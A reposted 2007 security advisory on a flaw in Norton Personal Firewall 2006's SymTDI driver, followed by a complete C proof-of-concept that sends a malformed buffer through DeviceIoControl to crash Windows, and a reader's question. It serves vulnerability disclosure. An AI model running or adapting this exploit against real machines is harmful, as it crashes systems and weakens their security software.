|
Brought to you by:
Suppliers of:
|
|
|
| |
Symantec Norton Personal Internet Firewall is "a widely used desktop firewalling application for Microsoft Windows NT, 98, 2000 platforms and Windows ME. Typically, personal firewalls are deployed upon mobile workstations that leave the enterprise and may be deployed upon public networks to enable them to establish connectivity back to the corporation and thus require protection from malicious attackers while outside the confines of the enterprise firewall".
A vulnerability in Norton's SymTDI device driver allows local attackers to cause the program to crash and assess malformed data, as the driver doesn't properly protect itself from access by unauthorized people. |
| |
Credit:
The information has been provided by Matousec - Transparent security Research.
The original article can be found at: http://www.matousec.com/info/advisories/Norton-Insufficient-validation-of-SymTDI-driver-input-buffer.php
|
| |
Vulnerable software:
* Norton Personal Firewall 2006 version 9.1.1.7
* Norton Personal Firewall 2006 version 9.1.0.33
* probably all versions of Norton Personal Firewall 2006, Norton Internet Security 2006 and other products that use SymTDI driver
* possibly older versions of Norton Personal Firewall and Norton Internet Security
Norton insufficiently protects its driver \Device\SymEvent against a manipulation by malicious applications and it fails to validate its input buffer. It is possible to open this driver and send arbitrary data to it, which are implicitly believed to be valid. It is possible to assemble the data in the input buffer such that the driver performs an invalid memory operation and crashes the whole operating system. Further impacts of this bug (like possibility of arbitrary code execution in the kernel mode) were not examined.
Events:
* 2007-03-15: Advisory released
* 2007-03-15: Vendor notification
Exploit:
/*
Testing program for Insufficient validation of "SymTDI" driver input buffer (BTP00012P002NF)
Usage:
prog
(the program is executed without special arguments)
Description:
This program uses standard Windows API CreateFile to open "SymTDI" driver and using DeviceIoControl it sends
a malicious buffer to the driver that crashs the system.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
void about(void)
{
printf("Testing program for Insufficient validation of \"SymTDI\" driver input buffer (BTP00012P002NF)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
/*
formats and prints the error message for system last error on the standard error output
*/
void print_last_error(void)
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
int main(int argc,char **argv)
{
about();
if (argc!=1)
{
usage();
return 1;
}
HANDLE file=CreateFile("\\\\.\\Global\\SymTDI",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,0,NULL);
if (file!=INVALID_HANDLE_VALUE)
{
DWORD retlen;
DeviceIoControl(file,0x83022003,(PVOID)1,256,(PVOID)1,256,&retlen,NULL);
} else
{
fprintf(stderr,"Unable to open SymTDI device.\n");
print_last_error();
fprintf(stderr,"\n");
}
printf("\nTEST FAILED!\n");
return 1;
}
|
| Subject:
|
have question |
Date: |
23 Mar. 2007 |
| From: |
azlanlannorazlanxpdchotmail.com |
| are the coding can run on c++ , just want to know |
|
|
|
|
|
|
